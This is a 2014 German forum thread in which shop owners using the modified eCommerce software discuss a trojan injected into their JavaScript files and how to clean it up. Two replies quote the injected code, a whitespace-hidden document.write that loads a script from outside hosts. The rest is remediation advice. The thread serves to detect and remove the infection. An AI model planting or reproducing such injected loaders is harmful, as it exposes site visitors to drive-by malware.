Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Trojaner?

    Webcraft Solutions

    • Mitglied
    • Beiträge: 144
    • Geschlecht:
    Trojaner?
    am: 04. März 2014, 19:48:21
    Hallo zusammen,

    ein Kunde von mir hat von seinem Webhoster folgende Mitteilung bekommen:

    Zitat
    leider mussten wir Ihren Account sperren, da über ein komprimitiertes Skript ein Trojaner über Ihren Account verbreitet wurde.

    Der Trojaner ist auf Ihrem Webspace hier abgelegt worden:

    ../templates/xtc5/javascript/thickbox.js

    Allerdings ist diese js-Datei doch kein Trojaner, sondern eine standardmäßige Datei des Shops, oder irre ich mich da ..!?

    Grüße

    Linkback: https://www.modified-shop.org/forum/index.php?topic=29571.0

    astaller

    • Fördermitglied
    • Beiträge: 686
    • Geschlecht:
    Re: Trojaner?
    Antwort #1 am: 04. März 2014, 19:50:17
    Hallo Webcraft Solutions,

    lass mich raten, Alfahosting?
    Genau die Meldung bekam ich heute auch.

    Hier wurden einige *.js-Dateien Kompromittiert.

    MfG
    Achim S.

    Webcraft Solutions

    • Mitglied
    • Beiträge: 144
    • Geschlecht:
    Re: Trojaner?
    Antwort #2 am: 04. März 2014, 19:51:52
    Ja richtig Achim :)

    Hmmm und was heißt das jetzt? Ich hab doch die neueste Shopversion drauf und auch die Sicherheitsupdates eingespielt ... was ist da passiert?

    Oder noch besser: Was muss ich nun unternehmen?

    Gruß Sascha

    astaller

    • Fördermitglied
    • Beiträge: 686
    • Geschlecht:
    Re: Trojaner?
    Antwort #3 am: 04. März 2014, 19:57:46
    Hmm, als erstes mal alle Passwörter ändern (FTP, Confixx, SQL, Kundenbereich).

    Ich habe mir alle Shopdaten runtergeladen und mit Dreamweaver eine Suche im ganzen Shop gestartet nach "kovar"...

    Bei mir sah die Datei so aus:
    Code: Javascript  [Auswählen]
    /*19f955*/

                                                                                                                                                                                             /*mm0941m09*/

    document.write("<script type='text/javascript' src='http://www.kovarmarketing.de/Z2GVjKyb.php?id='></"+ "script>");


    /*/19f955*/
     

    Den ganzen Code entfernt und wieder hochgeladen.
    Ich kenn jetzt leider keine Software (ausser Dreamweaver) mit welche du in den ganzen Shop-Dateien eine solche Suche machen kannst.
    Vieleicht ein anderes Forenmitglied...

    MfG
    Achim S.

    Webcraft Solutions

    • Mitglied
    • Beiträge: 144
    • Geschlecht:
    Re: Trojaner?
    Antwort #4 am: 04. März 2014, 20:01:11
    Editor hab ich Notepad++ damit hats auch wunderbar funktioniert.

    Danke für den Hinweis!

    Bei mir wars:

    Code: Javascript  [Auswählen]
    /*19f955*/

                                                                                                                                                                                             /*ndalfndalf097183ndalf09*/

    document.write("<script type='text/javascript' src='http://picquic.com/hYNtPL8g.php?id='></"+ "script>");


    /*/19f955*/

    astaller

    • Fördermitglied
    • Beiträge: 686
    • Geschlecht:
    Re: Trojaner?
    Antwort #5 am: 04. März 2014, 20:07:28
    nur zur Info, bei mir waren es aber mehrere Dateien, falls das nicht rüber kam.

    MfG
    Achim S.

    Matt

    • Experte
    • Beiträge: 4.241
    Re: Trojaner?
    Antwort #6 am: 04. März 2014, 20:09:34
    Es sind vermutlich alle .js Files betroffen, es gibt bereits einen Thread zu diesem Thema, Problem ist vermutlich mal wieder Filezilla.

    Webcraft Solutions

    • Mitglied
    • Beiträge: 144
    • Geschlecht:
    Re: Trojaner?
    Antwort #7 am: 04. März 2014, 20:11:24
    @ Achim: Ah ok, danke für den Hinweis! Naja, wüsste nicht welche anderen Dateien ich jetzt auf gut Glück noch durchsuchen sollte, diese eine war die einzige die angegeben wurde.
    Jedenfalls vielen Dank für deine schnelle Hilfe!

    @Matt: Nein, es wird Flash FXP verwendet, Filezilla ist schon lange verbannt ... ;-)

    Werde dann gleich mal noch weitere .js Files durchsehen, oder zur Not einfach das Backup von letzter Woche aufspielen, auch wenn dadurch einige Bestellungen verloren gehen ...

    Gruß Sascha

    Matt

    • Experte
    • Beiträge: 4.241
    Re: Trojaner?
    Antwort #8 am: 04. März 2014, 20:24:33
    Es ist nicht nötig das Datenbankbackup einzuspielen, die Files reichen völlig.

    Webcraft Solutions

    • Mitglied
    • Beiträge: 144
    • Geschlecht:
    Re: Trojaner?
    Antwort #9 am: 04. März 2014, 20:26:56
    In der Hektik verliert man schonmal die nötige Gelassenheit... du hast natürlich recht Matt, die DB ist ja nicht betroffen ... super - vielen Dank für den Hinweis! :-)  :thumbs:

    noRiddle (revilonetz)

    • Experte
    • Beiträge: 13.990
    • Geschlecht:
    Re: Trojaner?
    Antwort #10 am: 05. März 2014, 01:45:34
    Mmmh, langsam macht mir das aber Sorgen mit den kompromittierten Javascript-Files,
    sollte es da doch irgendwo eine Lücke im System geben ?
    Allein die Tatsache, daß im letzten Fall "Flash FXP" verwendet wurde und nicht "Filezilla" o.ä....,
    was natürlich nicht heißt, daß der verwendete Rechner nicht kompromittiert ist, aber seltsam ist das ganze schon.

    Mich würde interessieren ob jemand der diese Probleme mit kompromittierten Javascript-Files hat/hatte irgendeine Ajax-Implementation verwendet.

    Gruß,
    noRiddle

    ShopNix

    • Viel Schreiber
    • Beiträge: 1.208
    Re: Trojaner?
    Antwort #11 am: 05. März 2014, 08:49:45
    Es ist nicht nötig das Datenbankbackup einzuspielen, die Files reichen völlig.

    Bei jeder zweifelhaften Situation sollte man zumindest prüfen, ob es vielleicht einen zusätzlichen Admin gibt.

    Bonner

    • Fördermitglied
    • Beiträge: 848
    • Geschlecht:
    Re: Trojaner?
    Antwort #12 am: 05. März 2014, 10:30:45
    ja, es ist schon auffällig, das in den letzten Tagen vermehrt immer dieselben Probelme auftauchen.

    Filezilla ist bei mir auch raus und durch Win SCP (Danke an dmun für den Tip!) ersetzt.
    Wenn ich es heute schaffe, werde ich mal das Prüfsummen-Modul einbauen..ist jetzt nicht die letzte Sicherheit, aber doch nützlich.

    Als Alternative zu Dreamwaver gibt es für Windows den Superfinder XT (ist kostenlos). Da ist problemlos eine String-Suche etc möglich.

    p3e

    • Experte
    • Beiträge: 2.426
    Re: Trojaner?
    Antwort #13 am: 05. März 2014, 11:07:17
    Die Schnittmenge der beiden oberen Poster scheint ja Alfahosting zu sein. Ist wahrscheinlich ein Zufall, bin aber gespannt ob die Opfer des anderen Thema auch bei Alfahosting sind.
    Genauso gut kann es auch sein, dass Alfahosting lobenswerter Weise den Webspace regelmäßig überprüft und es den Kunden das mitteilt, was woanders erst viel später auffällt.

    Bonner

    • Fördermitglied
    • Beiträge: 848
    • Geschlecht:
    Re: Trojaner?
    Antwort #14 am: 05. März 2014, 11:16:08
    Nein bei den anderen war es die Serverfarm Netbeat in München, sowie Server in Argentinien bzw. Italien wie Matt dankenswerter Weise rausgefunden hat.

    Bonner
    4 Antworten
    3644 Aufrufe
    16. November 2011, 11:15:42 von ds170477
    7 Antworten
    4972 Aufrufe
    10. April 2012, 08:27:25 von hendrik
    0 Antworten
    3109 Aufrufe
    09. September 2011, 00:07:44 von Rheingold
    40 Antworten
    18439 Aufrufe
    04. August 2012, 12:32:41 von webmaster-uk
               
    anything